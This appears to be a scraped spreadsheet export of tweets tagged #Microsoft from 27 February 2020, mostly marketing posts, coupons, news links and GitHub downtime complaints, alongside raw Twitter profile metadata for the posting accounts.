    <t>{'id': 2859939645, 'id_str': '2859939645', 'name': 'Talk Think Do', 'screen_name': 'talkthinkdo', 'location': 'UK', 'description': '@TalkThinkDo is a @Microsoft Partner that specialises in helping organisations to achieve more through the #cloud with Azure.', 'url': 'https://t.co/o1FPtQzWzN', 'entities': {'url': {'urls': [{'url': 'https://t.co/o1FPtQzWzN', 'expanded_url': 'http://www.talkthinkdo.com', 'display_url': 'talkthinkdo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 311, 'listed_count': 1, 'created_at': 'Tue Nov 04 05:25:42 +0000 2014', 'favourites_count': 42, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 130,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'http://pbs.twimg.com/profile_images/1216123443025870848/whlciXgg_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216123443025870848/whlciXgg_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2859939645/1578781235', 'profile_link_color': '222662',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</si>
  <si>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16:01:43 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/esHgXQWwQE #Navegadores #Microsoft #Windows #EDGE #desenvolvedores #Windows 10 #Windows 10 Insiders via @OlharDigital</t>
  </si>
  <si>
    <t>{'id': 232965494, 'id_str': '232965494', 'name': 'rodrigo', 'screen_name': 'rodrigosc23', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 326, 'friends_count': 211, 'listed_count': 36, 'created_at': 'Sat Jan 01 22:07:04 +0000 2011', 'favourites_count': 306459, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 63920,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'http://pbs.twimg.com/profile_images/1153331583862104064/73V6H7bc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153331583862104064/73V6H7bc_normal.png',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</si>
  <si>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16:01:39 +0000 2020</t>
  </si>
  <si>
    <t>Know the signsis outdated accounting software putting your business at risk? Download the free Business Owner's Guide to Replacing Accounting Software.   #Microsoft #Technology #IT #BusinessAutomation #accounting #MSDyn365 https://t.co/1gBQxZOk2f</t>
  </si>
  <si>
    <t>Thu Feb 27 16:01:01 +0000 2020</t>
  </si>
  <si>
    <t>"#Windows7 has now entered its End of Life phase, which means that #Microsoft will no longer be offering updates for the old #operatingsystem." https://t.co/uQbu5A1Efy
#solutionsmadesimple #itsecurity #itsupport #itservices #itconsulting #cybersecurity #techradar #windows</t>
  </si>
  <si>
    <t>{'id': 3232716036, 'id_str': '3232716036', 'name': 'TWE Solutions', 'screen_name': 'twesolutions', 'location': 'Marina del Rey, CA', 'description': 'TWE Solutions brings together creative minds and best in breed technologies to deliver integrated technology solutions to businesses of all sizes.', 'url': 'http://t.co/7RBLUwRS0h', 'entities': {'url': {'urls': [{'url': 'http://t.co/7RBLUwRS0h', 'expanded_url': 'http://twe-solutions.com/', 'display_url': 'twe-solutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 62, 'friends_count': 313, 'listed_count': 1, 'created_at': 'Mon Jun 01 16:52:06 +0000 2015', 'favourites_count': 146, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/931667568548392960/6kp_Dc8N_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/931667568548392960/6kp_Dc8N_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3232716036/1521564033',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</si>
  <si>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16:01:00 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Deep Learning: Advanced Computer Vision (GANs, SSD, +More!) #udemycoupon -&amp;gt; https://t.co/B0IvSjbfWD
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>{'id': 970572251090186240, 'id_str': '970572251090186240', 'name': 'Coupon Free', 'screen_name': 'couponfree01', 'location': 'Dallas, NC', 'description': 'Visit https://t.co/KlWHEisgbp  for 100% free coupon codes from #Udemy. Updated hourly so we always have the freshest coupons. #UdemyCoupon #UdemyDiscount', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/KlWHEisgbp', 'expanded_url': 'http://couponfree.uk', 'display_url': 'couponfree.uk', 'indices': [6, 29]}]}}, 'protected': False, 'followers_count': 2095, 'friends_count': 4466, 'listed_count': 28, 'created_at': 'Mon Mar 05 08:10:31 +0000 2018', 'favourites_count': 93, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14916,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'http://pbs.twimg.com/profile_images/970573416821547009/oDkr4BWt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/970573416821547009/oDkr4BWt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/970572251090186240/1520237894',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</si>
  <si>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16:00:51 +0000 2020</t>
  </si>
  <si>
    <t>A secure foundation for #IoT, Azure Sphere now generally available https://t.co/VLeXZ9oKfy #Azure #Microsoft #Security# #InternetOfThings</t>
  </si>
  <si>
    <t>Thu Feb 27 16:00:03 +0000 2020</t>
  </si>
  <si>
    <t>Entrepreneurship and big corporate impact #Microsoft https://t.co/VXYAZF5ELy</t>
  </si>
  <si>
    <t>{'id': 17302338, 'id_str': '17302338', 'name': 'susan tidwell', 'screen_name': 'stidwell', 'location': '', 'description': 'Solver of business problems utilizing cool technology, connecting cool people and promoting STEM', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 254, 'friends_count': 222, 'listed_count': 72, 'created_at': 'Tue Nov 11 03:50:21 +0000 2008', 'favourites_count': 185, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2412, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '542035', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/689755143/the_moms__crop_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/689755143/the_moms__crop_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17302338/1442447060', 'profile_link_color': '562B87', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '9B889E', 'profile_text_color': '3D1957', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 15:59:45 +0000 2020</t>
  </si>
  <si>
    <t>Happy to meet Naria Santa Lucia  Senior Director of Skills and Employability at Microsoft. 
Great conversation about Digital Transformation, The human factor, how would Women jobs be impacted with automation...
#DigitalTransformation #Microsoft https://t.co/UAE3ZdN2Bc</t>
  </si>
  <si>
    <t>{'id': 2571678061, 'id_str': '2571678061', 'name': 'ines.nasri', 'screen_name': 'inesnasriWP', 'location': '', 'description': 'ðŸ† CEO of WebPower Agency\nðŸŽ™ International Speaker\nðŸŽ¯ Professional Trainer\nðŸš€ Digital Technology Optimist\nðŸ“º TV columnist', 'url': 'https://t.co/QmJNrzDqOB', 'entities': {'url': {'urls': [{'url': 'https://t.co/QmJNrzDqOB', 'expanded_url': 'http://www.InesNasri.com', 'display_url': 'InesNasri.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 447, 'friends_count': 342, 'listed_count': 1, 'created_at': 'Mon Jun 16 21:19:34 +0000 2014', 'favourites_count': 278, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 229,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'http://pbs.twimg.com/profile_images/922956190857953280/IHwLMLlI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/922956190857953280/IHwLMLlI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2571678061/1566910886',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</si>
  <si>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15:59:05 +0000 2020</t>
  </si>
  <si>
    <t>Whats the deal with #Microsoft Defender for Android and iOS? https://t.co/f8vnti5ejv via @Hybrid_Circle #Cloud #Hybrid</t>
  </si>
  <si>
    <t>{'id': 4047861143, 'id_str': '4047861143', 'name': 'HYBRID CIRCLE', 'screen_name': 'Hybrid_Circle', 'location': 'London, UK', 'description': 'A Leading IT Infrastructure, Cloud &amp; Consultancy Resourcing Partner in the UK. Technology Experts delivering #ITRecruitment #Azure #AWS â€“ Tel: 0333 666 666 0', 'url': 'https://t.co/E6kiGRnKYP', 'entities': {'url': {'urls': [{'url': 'https://t.co/E6kiGRnKYP', 'expanded_url': 'http://www.hybridcircle.co.uk', 'display_url': 'hybridcircle.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 591, 'friends_count': 2244, 'listed_count': 72, 'created_at': 'Mon Oct 26 18:10:18 +0000 2015', 'favourites_count': 447, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9999,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'http://pbs.twimg.com/profile_images/677554516275916800/AxD9ZVSH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/677554516275916800/AxD9ZVSH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4047861143/1450376923',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</si>
  <si>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Feb 27 15:58:36 +0000 2020</t>
  </si>
  <si>
    <t>How one man could have flooded your phone with Microsoft spam https://t.co/KAQb1b5AV6 #Vulnerability #Epifiano #Microsoft #SMS #Spam</t>
  </si>
  <si>
    <t>Thu Feb 27 15:55:50 +0000 2020</t>
  </si>
  <si>
    <t>Always dreamed of seeing @microsoft and @WuTangClan together?
Get ready, cos it's come true!
https://t.co/v9Wr0LfVDQ
#microsoft #sqlserver https://t.co/DTlPtggGkL</t>
  </si>
  <si>
    <t>{'id': 16024563, 'id_str': '16024563', 'name': 'Rich Gibbons', 'screen_name': 'Rich_Gibbons', 'location': 'Shaolin', 'description': 'Head of Content &amp; Training @ITAMReview, Microsoft Licensing Trainer, cloud cost management, #FinOps, Red Manc, alleged football hipster, hip-hop fan. He/him.', 'url': 'https://t.co/kzzqpdI3Ui', 'entities': {'url': {'urls': [{'url': 'https://t.co/kzzqpdI3Ui', 'expanded_url': 'http://www.richardgibbonsuk.wordpress.com', 'display_url': 'richardgibbonsuk.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1651, 'friends_count': 2913, 'listed_count': 133, 'created_at': 'Thu Aug 28 08:08:27 +0000 2008', 'favourites_count': 21408, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 21563,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'http://pbs.twimg.com/profile_images/1223933143121637377/B5X2Zwlx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223933143121637377/B5X2Zwlx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16024563/1485259105', 'profile_link_color': '2FC2EF',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</si>
  <si>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Feb 27 15:53:44 +0000 2020</t>
  </si>
  <si>
    <t>@NSA Discovered a Serious #Microsoft #Software #Vulnerability  and Told #Microsoft #RTLblog via @sharonnelsonesq &amp;amp; @washingtonpost #Security #CyberSecurity #breach #Databreach #data #ThursdayWisdom #TechNews #datasecurity 
https://t.co/XEeztD3BOE https://t.co/IVWidR6MVN</t>
  </si>
  <si>
    <t>Thu Feb 27 15:53:33 +0000 2020</t>
  </si>
  <si>
    <t>The Enterprise Software Showcase is back! Meet with #ERP heavy-hitters like #Microsoft, #Infor, #Sage, #IFS and more! Come join us in Orlando, FL on May 12-14. Register now for early bird pricing: https://t.co/yNIuW2Khkk #ESSSpring2020 #manufacturing #ensw #software https://t.co/WP5lMSOkTW</t>
  </si>
  <si>
    <t>{'id': 75091923, 'id_str': '75091923', 'name': 'TEC', 'screen_name': 'TECtweets', 'location': 'Canada', 'description': 'TEC helps organizations choose the best enterprise software solutions for their unique business needs. Visit https://t.co/1ZgeQ4LV1I #EnSW #ERP #BI #HCM', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/1ZgeQ4LV1I', 'expanded_url': 'http://technologyevaluation.com', 'display_url': 'technologyevaluation.com', 'indices': [109, 132]}]}}, 'protected': False, 'followers_count': 3163, 'friends_count': 908, 'listed_count': 242, 'created_at': 'Thu Sep 17 19:24:06 +0000 2009', 'favourites_count': 648, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7160, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'BCC8C6', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1220007969942855681/Xg7p8iK7_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220007969942855681/Xg7p8iK7_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/75091923/1579809672', 'profile_link_color': 'BA1111', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '1A1A1A', 'profile_text_color': 'F4F3F3', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 15:52:14 +0000 2020</t>
  </si>
  <si>
    <t>Data source: Microsoft Annual Report 2019
#microsoft #azure #devops #windows #cloud #ai #cloudcomputing #office365 #microsoftcloud #microsoftai #devices #linkedin #bing #enterpriseservices #xbox #playstation #microsoftsurface #apple #amazon #aws #financelookup #flookup https://t.co/rK6ebVpUyw</t>
  </si>
  <si>
    <t>{'id': 809841307808133120, 'id_str': '809841307808133120', 'name': 'F Lookup', 'screen_name': 'FinanceLookup', 'location': 'Mumbai, India', 'description': 'The clue is in the name-"Finance lookup" with us. We are here as Registered Valuer, Export/Import house Virtual CFO &amp; Automation.', 'url': 'https://t.co/zF4UG2ZrTV', 'entities': {'url': {'urls': [{'url': 'https://t.co/zF4UG2ZrTV', 'expanded_url': 'http://www.flookup.com', 'display_url': 'flookup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 89, 'friends_count': 164, 'listed_count': 1, 'created_at': 'Fri Dec 16 19:23:08 +0000 2016', 'favourites_count': 105, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 203,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'http://pbs.twimg.com/profile_images/1141878755985522688/c3pRqBux_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141878755985522688/c3pRqBux_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/809841307808133120/1512356447',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</si>
  <si>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15:52:05 +0000 2020</t>
  </si>
  <si>
    <t>Students love dictating their research papers into Microsoft Word! I dont have to worry about my slow typing. I can focus on editing! #weareswans #scestech #DLDay #Microsoft https://t.co/7yrN5Hpkzi</t>
  </si>
  <si>
    <t>{'id': 923592892366643200, 'id_str': '923592892366643200', 'name': 'Mrs. Sherman', 'screen_name': 'MsShermanSCES', 'location': '', 'description': 'Iâ€™m a teacher, mother, wife, read aloud voice changer, ðŸˆ watcher, ðŸ¥ spectator, Marvel fan, technology learner, relationship builder 1-circle at a time', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 195, 'friends_count': 100, 'listed_count': 1, 'created_at': 'Thu Oct 26 16:51:19 +0000 2017', 'favourites_count': 12239, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 794, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/972187468748460032/nC3dTpoU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/972187468748460032/nC3dTpoU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/923592892366643200/1573422449',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</si>
  <si>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15:50:48 +0000 2020</t>
  </si>
  <si>
    <t>#Read #eBook The #Perfect #Game by #Christopher J @GoldRetriever99 at #smashwords - https://t.co/8nMea8jigA - #Coupon #Code #NB64X #podcast #Twitter #Facebook #Google #Microsoft #stocks #Coronavirus #virus #gift #buy #MLB #baseball #promotion #author #writer #deal #sale #bitcoin</t>
  </si>
  <si>
    <t>{'id': 178395557, 'id_str': '178395557', 'name': 'Sheeba', 'screen_name': 'GoldRetriever99', 'location': '', 'description': "I was adopted on September 3, 2005...I was in a shelter in South Carolina when Catrina saw my new dad's ad on https://t.co/mUTDxsDLie; a rescue group drove me north!", 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/mUTDxsDLie', 'expanded_url': 'http://Petfinder.com', 'display_url': 'Petfinder.com', 'indices': [110, 133]}]}}, 'protected': False, 'followers_count': 549, 'friends_count': 500, 'listed_count': 187, 'created_at': 'Sat Aug 14 17:07:30 +0000 2010', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 23967,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'http://pbs.twimg.com/profile_images/1122001202/Sheeba-Car_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1122001202/Sheeba-Car_normal.jpg',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</si>
  <si>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15:50:15 +0000 2020</t>
  </si>
  <si>
    <t>[#Marketing]
#LinkedIn has an average user session length of over 6 min, with 52% of buyers listing the #Microsoft-owned platform as the most influential channel during the research process  some of the information contained in a recent #Infographic.
https://t.co/jEvumk3wGA</t>
  </si>
  <si>
    <t>{'id': 26448352, 'id_str': '26448352', 'name': '530medialab', 'screen_name': '530medialab', 'location': 'Orange County, CA', 'description': '530medialab Builds Online Empires For Lifestyle Brands. \nSchedule A Discovery Session\nMarketing | WebDevelopment | Creative', 'url': 'https://t.co/kT0gjaI6p0', 'entities': {'url': {'urls': [{'url': 'https://t.co/kT0gjaI6p0', 'expanded_url': 'http://530medialab.com/', 'display_url': '530medialab.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 617, 'friends_count': 56, 'listed_count': 24, 'created_at': 'Wed Mar 25 06:52:18 +0000 2009', 'favourites_count': 74, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1293,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'http://pbs.twimg.com/profile_images/451499832813711360/cRJBYfLh_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/451499832813711360/cRJBYfLh_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/26448352/1551826595', 'profile_link_color': '383638', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '4D4D4D', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 15:47:52 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft     85% of supporters say they're more likely to support a nonprofit if it shows how it is using tech to run its programs in a better way. Download "Beyond overhead" brought to you by @msftnonprofits, to read the survey results. https://t.co/MJEBUAuysK</t>
  </si>
  <si>
    <t>Thu Feb 27 15:47:39 +0000 2020</t>
  </si>
  <si>
    <t>Now I'm really afraid! Should I click the "delete branch" button on @github after merging a pull request or will it get rid of whole repository? Alright, they will call it a feature and be #down for a week... #irony #Microsoft #downtime</t>
  </si>
  <si>
    <t>{'id': 34536847, 'id_str': '34536847', 'name': 'Victor SchrÃ¶der', 'screen_name': 'schrodervictor', 'location': 'Berlin, Germany', 'description': 'Beautiful Code Polizei. TDD. Full time Nerd. Engineering. Tech lead. Entrepreneur.  Mathematics. Trekkie. Deutschlerner.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 402, 'friends_count': 1605, 'listed_count': 20, 'created_at': 'Thu Apr 23 04:52:20 +0000 2009', 'favourites_count': 1077, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1315,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'http://pbs.twimg.com/profile_images/3180414632/3fae4d4c61b611f7f8d5b240ff204321_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3180414632/3fae4d4c61b611f7f8d5b240ff204321_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/34536847/1359484755', 'profile_link_color': '9D582E', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'EADEAA', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 15:45:40 +0000 2020</t>
  </si>
  <si>
    <t>Working through connecting data sources for our Common Data Service, Marketo and LinkedIn case study. #valoremreply #d365thoughts #microsoft #d365 #Dynamics365 #customerinsights https://t.co/ac4CxWB3Zy</t>
  </si>
  <si>
    <t>Thu Feb 27 15:45:15 +0000 2020</t>
  </si>
  <si>
    <t>Want to learn more about Power BI? Weve created modules filled with tips and tricks on how to make Power Apps work for you. #MSPartner #Microsoft https://t.co/oC7PMp6rIU</t>
  </si>
  <si>
    <t>Thu Feb 27 15:45:04 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that 83% of employees depend on #technology to work together? 
The landscape of #teamwork is changing--but we've got you covered. 
Check out this info-graphic to see how you can benefit from #Teamworksolutions from #Microsoft: https://t.co/6Ai8Vj3vjx https://t.co/4MO3q5E1dV</t>
  </si>
  <si>
    <t>Thu Feb 27 15:44:13 +0000 2020</t>
  </si>
  <si>
    <t>Windows Presentation Foundation Masterclass 
https://t.co/s7LB3K1rZZ
#BehindTheSlides #GoogleSlides #PowerPoint #Intel #Microsoft #Ad #Windows10 #NintendoSwitch #Xbox #javascript30 #javascrip #html5 #css3 #100DaysOfCode #webdev #100DaysOfMLCode #udemy https://t.co/X8kjdN9kXt</t>
  </si>
  <si>
    <t>{'id': 1112624722250878976, 'id_str': '1112624722250878976', 'name': 'kinds   courses', 'screen_name': 'CoursesKinds', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 42, 'friends_count': 20, 'listed_count': 6, 'created_at': 'Mon Apr 01 07:56:20 +0000 2019', 'favourites_count': 179, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 505, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1112631717976629248/gsM6oH-S_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1112631717976629248/gsM6oH-S_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1112624722250878976/1554107166',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</si>
  <si>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15:39:51 +0000 2020</t>
  </si>
  <si>
    <t>@github #down... can't push branches, can't comment on pull requests, gives 500's here and there, CI requests to/from Travis don't work. #github #Microsoft #downtime</t>
  </si>
  <si>
    <t>Thu Feb 27 15:38:02 +0000 2020</t>
  </si>
  <si>
    <t>Cyber criminals are using new tactics to stay ahead of the defenders.  Microsoft has reported on some noteworthy phishing methods:  https://t.co/qY8WE9UWhf.  Call Simplify Technology  a Microsoft Silver Partner  at 615-375-6634 and let us  help you!  #simplifytech #microsoft https://t.co/2e33PAvU4X</t>
  </si>
  <si>
    <t>{'id': 806885990287736832, 'id_str': '806885990287736832', 'name': 'Simplify Technology', 'screen_name': 'simplifytechinc', 'location': 'Columbia, TN', 'description': 'Simplify Technology LLC provides on-site, online, and security services for your business by managing or enhancing your existing infrastructure.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Thu Dec 08 15:39:46 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1159201486989119488/-aC9mukT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159201486989119488/-aC9mukT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/806885990287736832/1481220367',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</si>
  <si>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15:37:46 +0000 2020</t>
  </si>
  <si>
    <t>The Dynamics 365 AI system can provide benefits to your business and could be even more efficient with the help of Dynamix.
Check out our the benefits of Dynamix implementation your D365 system! - https://t.co/xp2Q7GKzzk
#Microsoft #Dynamics365 #Dynamix https://t.co/qn0ksHqlna</t>
  </si>
  <si>
    <t>{'id': 1031517068, 'id_str': '1031517068', 'name': 'Matt Oldfield', 'screen_name': 'dynamix_matt', 'location': 'Yorkshire, UK', 'description': 'IT Consultant -  Specialising in solutions for  the waste &amp; recycling industry.', 'url': 'https://t.co/UWQkER95YQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/UWQkER95YQ', 'expanded_url': 'http://dynamix.co.uk', 'display_url': 'dynamix.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5291, 'friends_count': 4034, 'listed_count': 47, 'created_at': 'Sun Dec 23 23:13:54 +0000 2012', 'favourites_count': 1111, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2929,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'http://pbs.twimg.com/profile_images/1023300719166857218/sdWSkLXq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1023300719166857218/sdWSkLXq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1031517068/1506941091',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</si>
  <si>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15:35:53 +0000 2020</t>
  </si>
  <si>
    <t>WEBINAR, TODAY, 2/27/20!
Microsoft Teams can grow quickly and be distracting as a workspace. We'll share best practices on how to create intuitive spaces, reduce distractions and keep your data safe. Register here: https://t.co/334GDgVEr7
#Microsoft #Workshop #Free https://t.co/wQpxm5Oyiq</t>
  </si>
  <si>
    <t>{'id': 1042535073382203392, 'id_str': '1042535073382203392', 'name': 'Pivotal Consulting', 'screen_name': 'Go_Pivotal', 'location': 'Seattle, WA', 'description': 'Pivotal Consulting is a technology management consulting firm delivering strategic solutions and project staffing.\n\nFB: Go_Pivotal\nIG: PivotalConsultingLLC', 'url': 'https://t.co/3lUUsyEUhi', 'entities': {'url': {'urls': [{'url': 'https://t.co/3lUUsyEUhi', 'expanded_url': 'https://www.pivotalconsults.com/', 'display_url': 'pivotalconsults.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 157, 'listed_count': 0, 'created_at': 'Wed Sep 19 22:05:05 +0000 2018', 'favourites_count': 403, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 288,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'http://pbs.twimg.com/profile_images/1113909604713283585/qaDJruK6_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1113909604713283585/qaDJruK6_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1042535073382203392/1554312979',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</si>
  <si>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15:35:43 +0000 2020</t>
  </si>
  <si>
    <t>I like totally free Manchester United #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 15:35:35 +0000 2020</t>
  </si>
  <si>
    <t>#News #Computing #Microsoft Leaked video shows cool way to peek at notifications, calls on Surface Duo https://t.co/tZUNUKN1dM</t>
  </si>
  <si>
    <t>{'id': 18503129, 'id_str': '18503129', 'name': 'AIVAnet', 'screen_name': 'aivanet', 'location': 'Athens, Greece', 'description': '', 'url': 'http://t.co/d3TYk0Qa0l', 'entities': {'url': {'urls': [{'url': 'http://t.co/d3TYk0Qa0l', 'expanded_url': 'http://www.aivanet.com', 'display_url': 'aivanet.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 401, 'friends_count': 8, 'listed_count': 301, 'created_at': 'Wed Dec 31 09:16:30 +0000 2008', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 240609,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'http://pbs.twimg.com/profile_images/3657506348/8e8abee9de29e1154ac483bc2fbb4fd0_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3657506348/8e8abee9de29e1154ac483bc2fbb4fd0_normal.png', 'profile_link_color': '2FC2EF', 'profile_sidebar_border_color': '181A1E', 'profile_sidebar_fill_color': '252429', 'profile_text_color': '9C9C9C', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 15:35:06 +0000 2020</t>
  </si>
  <si>
    <t>LIVE WEBINAR | MAR 5, 2020
SmartTAP 360 Meets #Microsoft #Teams. Advanced Compliance Recording Solution for Enterprises.
Join AudioCodes for this #webinar to hear all about SmartTAP 360 newest features. https://t.co/kZW0nICww2 https://t.co/4PbW7ebxZk</t>
  </si>
  <si>
